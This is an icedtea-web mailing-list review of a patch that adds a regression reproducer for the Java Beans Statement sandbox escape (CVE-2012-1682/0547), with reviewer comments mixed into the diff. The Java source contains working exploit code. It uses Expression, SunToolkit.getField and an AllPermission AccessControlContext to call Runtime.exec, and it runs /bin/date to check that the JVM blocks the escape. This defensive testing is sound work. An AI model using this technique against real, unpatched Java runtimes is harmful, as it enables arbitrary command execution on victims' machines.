[rfc][icedtea-web] Reproducer of BeansStatement behaviour
Adam Domurad
adomurad at redhat.com
Mon Dec 17 09:10:19 PST 2012
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandbox.html
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandbox.html
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,42 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<html><head></head><body bgcolor="blue">
> +<p><applet code="BeansStatementBreakSandbox1.class"
> archive="BeansStatementBreakSandbox.jar" codebase="." width="100"
> height="20">
> +</applet></p>
> +</body>
> +</html>
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxApplet.jnlp
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxApplet.jnlp
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,61 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementBreakSandboxApplet.jnlp"
> codebase=".">
> + <information>
> + <title>BeansStatementBreakSandboxApplet</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementBreakSandboxApplet</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementBreakSandbox.jar"/>
> + </resources>
> + <applet-desc
> + documentBase="."
> + name="BeansStatementBreakSandboxApplet"
> + main-class="BeansStatementBreakSandbox1"
> + width="100"
> + height="100">
> + </applet-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxWS.jnlp
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/resources/BeansStatementBreakSandboxWS.jnlp
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,56 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementBreakSandboxWS.jnlp" codebase=".">
> + <information>
> + <title>BeansStatementBreakSandboxWS</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementBreakSandboxWS</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementBreakSandbox.jar"/>
> + </resources>
> + <application-desc main-class="BeansStatementBreakSandbox2">
> + </application-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox1.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox1.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,49 @@
> +/* BeansStatementBreakSandbox1.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.applet.Applet;
> +
> +
> +public class BeansStatementBreakSandbox1 extends Applet {
Argh, you love numbers :-) It's OK in this case since its easy to see
what this does at a glance, but I prefer adding an extra word to the
name when you need to make a distinction, eg 'Runner' or 'Delegate' here.
> +
> + @Override
> + public void init() {
> + BeansStatementBreakSandbox2.main(new String[0]);
> +
> + }
> +
> +}
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox2.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/srcs/BeansStatementBreakSandbox2.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,182 @@
> +/* BeansStatementBreakSandbox2.java
> + Copyright (C) 2011 Red Hat, Inc.
> +
> + This file is part of IcedTea.
> +
> + IcedTea is free software; you can redistribute it and/or
> + modify it under the terms of the GNU General Public License as
> published by
> + the Free Software Foundation, version 2.
> +
> + IcedTea is distributed in the hope that it will be useful,
> + but WITHOUT ANY WARRANTY; without even the implied warranty of
> + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> + General Public License for more details.
> +
> + You should have received a copy of the GNU General Public License
> + along with IcedTea; see the file COPYING. If not, write to
> + the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> + 02110-1301 USA.
> +
> + Linking this library statically or dynamically with other modules is
> + making a combined work based on this library. Thus, the terms and
> + conditions of the GNU General Public License cover the whole
> + combination.
> +
> + As a special exception, the copyright holders of this library give you
> + permission to link this library with independent modules to produce an
> + executable, regardless of the license terms of these independent
> + modules, and to copy and distribute the resulting executable under
> + terms of your choice, provided that you also meet, for each linked
> + independent module, the terms and conditions of the license of that
> + module. An independent module is a module which is not derived from
> + or based on this library. If you modify this library, you may extend
> + this exception to your version of the library, but you are not
> + obligated to do so. If you do not wish to do so, delete this
> + exception statement from your version.
> + */
> +
> +import java.beans.Statement;
> +import java.beans.Expression;
> +
> +import java.lang.reflect.Field;
> +import java.net.URL;
> +import java.security.*;
> +import java.security.cert.Certificate;
> +import java.io.InputStreamReader;
> +import java.io.BufferedReader;
> +
> +/**
> + *
> + * Summary for
Was there supposed to be something more here ? Or is it something like
'See:' ?
> + *
> + * @
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682 and
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
> + */
> +public class BeansStatementBreakSandbox2 {
> +
> + public static int runproc(Process proc) throws Exception {
> + BufferedReader cmdout = new BufferedReader(new
> InputStreamReader(proc.getInputStream()));
> + String line;
> + while ((line = cmdout.readLine()) != null) {
> + System.out.println(line);
> + }
> + proc.waitFor();
> + return proc.exitValue();
> + }
> +
> + public static void runcommand_exploit(String cmd) throws Exception {
> + Expression exec_ex = new Expression(Runtime.getRuntime(),
> "exec", new String[]{cmd});
> +
> + Permissions perms = new Permissions();
> + perms.add(new AllPermission());
> + ProtectionDomain protdomain = new ProtectionDomain(
> + new CodeSource(new URL("file:///"), new
> Certificate[0]), perms);
> + AccessControlContext acc = new AccessControlContext(new
> ProtectionDomain[]{protdomain});
> +
> + Expression tmp_ex = new Expression(Class.class, "forName",
> new Object[]{"sun.awt.SunToolkit"});
> + tmp_ex.execute();
> + Class toolkit = (Class) tmp_ex.getValue();
> +
> + tmp_ex = new Expression(toolkit, "getField", new
> Object[]{Statement.class, "acc"});
> + tmp_ex.execute();
> + ((Field) tmp_ex.getValue()).set(exec_ex, acc);
> + exec_ex.execute();
> +
> + runproc((Process) exec_ex.getValue());
> + }
> +
> + public static void runcommand_direct(String cmd) throws Exception {
> + runproc(Runtime.getRuntime().exec(cmd));
> + }
> +
> + public static void main(String[] args) {
> + try {
> + System.out.println("Running GondvvTest");
> + args = new String[]{"/bin/date"};
> + try {
> + System.out.println("Directly calling:
> Class.forName(\"sun.awt.SunToolkit\")");
> +
> + Object cl = Class.forName("sun.awt.SunToolkit");
> + System.out.println("FAIL: " + cl.toString());
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> +
> + try {
> + System.out.println("Calling: Expression(Class.class,
> \"forName\", new String[]{\"sun.awt.SunToolkit\"})");
> +
> + Expression ex = new Expression(Class.class,
> "forName", new String[]{"sun.awt.SunToolkit"});
> + ex.execute();
> + Object cl = ex.getValue();
> + System.out.println("FAIL: " + cl.toString());
> + System.out.println();
> + System.out.println("Checking if SunToolkit class
> reference is usable");
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Byte.class, "SIZE"});
> + ex.execute();
> + System.out.println("FAIL: " +
> ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: "
> + e.toString());
> + e.printStackTrace();
> + }
> +
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Statement.class, "acc"});
> + ex.execute();
> + System.out.println("FAIL: " +
> ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: "
> + e.toString());
> + e.printStackTrace();
> + }
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + try {
> + System.out.println("Running command directly: " +
> args[0]);
> + runcommand_direct(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + try {
> + System.out.println("Running command using exploit: "
> + args[0]);
> + runcommand_exploit(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("FAIL: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> + } finally {
> + System.out.println("*** APPLET FINISHED ***");
> + }
> +
> + }
> +}
> diff -r afea49865f57
> tests/reproducers/simple/BeansStatementBreakSandbox/testcases/BeansStatementBreakSandboxTests.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementBreakSandbox/testcases/BeansStatementBreakSandboxTests.java
> Mon Dec 17 17:13:25 2012 +0100
> @@ -0,0 +1,83 @@
> +/* BeansStatementBreakSandboxTests.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import net.sourceforge.jnlp.ProcessResult;
> +import net.sourceforge.jnlp.annotations.Bug;
> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
> +import net.sourceforge.jnlp.browsertesting.Browsers;
> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
> +import net.sourceforge.jnlp.closinglisteners.AutoOkClosingListener;
> +import org.junit.Assert;
> +
> +import org.junit.Test;
> +
> +public class BeansStatementBreakSandboxTests extends BrowserTest {
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTestWS() throws Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementBreakSandboxWS.jnlp", new
> AutoOkClosingListener(),null, null);
>
Why does javaws needs a closing listener here ?
> + evaluate(pr);
> + }
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTesWsApplet() throws
> Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementBreakSandboxApplet.jnlp", new
> AutoOkClosingListener(),null, null);
> + evaluate(pr);
> + }
> +
> + @Test
> + @TestInBrowsers(testIn = {Browsers.all})
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementBreakSandboxTestApplet() throws Exception {
> + ProcessResult pr =
> server.executeBrowser("/BeansStatementBreakSandbox.html", new
> AutoOkClosingListener(),null);
> + evaluate(pr);
> + Assert.assertTrue(pr.wasTerminated);
> + }
> +
> + private void evaluate(ProcessResult pr) {
> + Assert.assertTrue("Output of reproducerwas empty => it was
> not run", (pr.stdout.length() > 0));
> + Assert.assertTrue("Output of reproducerwas have not
> contained 'Running GondvvTest' => it was not run",
> (pr.stdout.contains("Running GondvvTest")));
> + Assert.assertFalse("Output of reproducer contained FAIL, that
> means that exploit have hacked your system",
> (pr.stdout.contains("FAIL:")));
> +
> + }
> +}
Looks OK from my end, but do answer to Omair :-)
-Adam
More information about the distro-pkg-dev
mailing list